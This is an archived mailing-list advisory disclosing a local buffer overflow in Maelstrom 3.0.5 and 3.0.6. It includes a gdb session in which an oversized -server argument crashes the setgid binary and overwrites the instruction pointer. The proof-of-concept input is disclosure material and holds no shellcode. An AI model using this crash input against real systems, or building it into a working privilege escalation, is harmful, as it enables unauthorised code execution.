Maelstrom Buffer Overflow

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




Maelstrom is an arcade game. There is a buffer overflow vulnerability in 
Maelstrom which allow local attacker 
arbitrary code execution.

Vulnerable systems: Maelstrom 3.0.6
		    Maelstrom 3.0.5

Example:
 
[lucae@linux]$ gdb /usr/bin/Maelstrom 

GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you 
are
welcome to change it and/or distribute copies of it under certain 
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...

(gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'`
(gdb) r

Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD" x 
9999'`
Couldn't resolve host name for ABCDABC......ABCD

Program received signal SIGSEGV, Segmentation fault.
0x41444342 in ?? ()

(gdb) Quit



Note: -rwxr-sr-x    1 root     games      171568 19 feb 
03:38 /usr/bin/Maelstrom   in Linux Professional 9.0



Luca Ercoli luca.ercoli@inwind.it

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux